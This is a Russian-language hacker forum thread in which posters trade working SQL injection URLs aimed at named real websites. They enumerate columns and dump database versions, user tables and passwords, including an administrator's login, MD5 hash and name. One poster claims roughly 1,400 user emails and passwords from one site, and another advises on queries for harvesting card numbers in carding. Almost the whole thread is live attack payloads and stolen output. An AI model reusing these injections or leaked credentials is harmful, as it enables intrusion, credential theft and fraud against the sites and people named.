SQL Инъекции

Пожалуйста

З.ы Spyder - жжошь... правда последний char в адресную строку не поместился.

 

что-то я седня не в форме

Code:

http://www.pouet.net/prod.php?which=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+from+users/*

колонки опять не подобрал........... ппц (
версия 5.

 

n1†R0x

Колонки то есть, но вот колонку с паролем не нашел ))

 

www.casinoratgeber.com

Переходим на казино =)

Code:

http://www.casinoratgeber.com/index.php?bid=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

 

аналогично)
ps:

Code:

http://www.ipspackaging.com/packaging.php?cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/*

ничего стандартное не подошло

 

Еще скули:

Code:

http://itjob.dp.ua/search.php3?whatlooking=vacancies&searchtype=browse&category=9'
Кол-во полей так и не подобрал(( При 16 ошибок 2 в других случаях 1

http://itjob.dp.ua/product.php3?product=-1 union select 1,2,user(),4,5,6,7/*
http://itjob.dp.ua/product.php3?product=-1 union select 1,2,user(),4,5,6/*
Работает и та и та, ток выводит в разных местах)

 

Не трогать, она моя ща доделаю =)


Вот, щас колонки пробью.

Code:

http://itjob.dp.ua/product.php3?product=-1+union+select+1,2,3,4,5,6,7+from+auth/*

Code:

http://itjob.dp.ua/product.php3?product=-1+union+select+1,2,name,4,5,6,7+from+auth/*

Пасс чет не идет =(

 

=\
CONCAT_WS рулит =\

 

Code:

http://bookashop.ru/book/?book=-1+union+select+1,2,concat(database(),char(58),user(),char(58),version()),4,5,6,7,8,9,10,11,12,13,14/*

 

Grey, проще использовать функцию CONCAT_WS(разделитель,строка1,строка2,...)

 

чем проще?

 

Spyder, согласен. Но в случае с выводом всего двух столбцов разницы имхо никакой)
так что:
red-tape.org

Code:

http://www.red-tape.org/initiatives.php?id=-1+union+select+1,concat(email,0x3a,password),3,4,5,6,7,8,9,10,11+from+ld_users+limit+0,1/*

около 1400 юзеров
пассы в md5
email:рass

 

Вот, добил itjob.dp.ua:

Code:

http://itjob.dp.ua/product.php3?product=-1 union select 1,2,concat(id,char(58),login,char(58),passw,char(58),name),4,5,6 from auth/*

Вот он, админчег:

Code:

1:admin:ee550a634df47433c1f0caf2ef867c4d:Yuriy S.

 

[ cash ], ты наркоман что ле или просто не знаешь что делает эта функция?
давай представим стандартный кардерский запрос c функцией concat()
select+1,concat(id,char(58),email,char(58),ccn,char(58),name,......),3
не проще ли сказать с помощью функцией CONCAT_WS()
select+1,concat_ws(char(58),id,email,ccn,name,...),3

Если ты просто не знаешь что она делает то эта функция в учебнике выглядит так CONCAT_WS(разделитель,строка1,строка2,строка3)
Когда объеденяется 2 или 3 столбца то это конечно не нужно, но при больших запросах, где надо вывести много инфы лучше использовать эту функцию =)

ЗЫ У тебя на сайте написано

/me плачет

 

Code:

http://www.rda.ge/news.php?id=-4+union+select+1,2,CONCAT_WS(char(58),user(),database(),version()),4,5,6,7,8,9,10/*

Code:

http://www.nsf.ac.lk/events.php?ID=22%20UNION%20SELECT%201,AES_DECRYPT(AES_ENCRYPT(password,0x71),0x71),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+mysql.user+limit+1,1/*

 

Code:

http://www.fur.su/index.php?id=-1+union+select+1,2,3,4,5/*&type=1&lang=r&pg=1

 

http://www.volgagis.ru/web/editweb.php?id=-1+union+select+1,2,3,4,convert(version()+using+cp1251),6,7,8,9,10,11,12,13/*
__
Наконец выходные!!!

 

http://www.opera.ge/eng/news.php?id=-328+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat(password,0x3a,username),21,22,23,24,25,26,27,28,29,30,31,32+from+users/*&menu=news

))думал браузер

 

http://www.dama.cz/tisk.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,table_name,15,16,17,18+from+INFORMATION_SCHEMA.TABLES+limit+65,1/*

5-ая версия))) 66 таблиц .

 

гов =\ чё то там ничё не получается вывести
update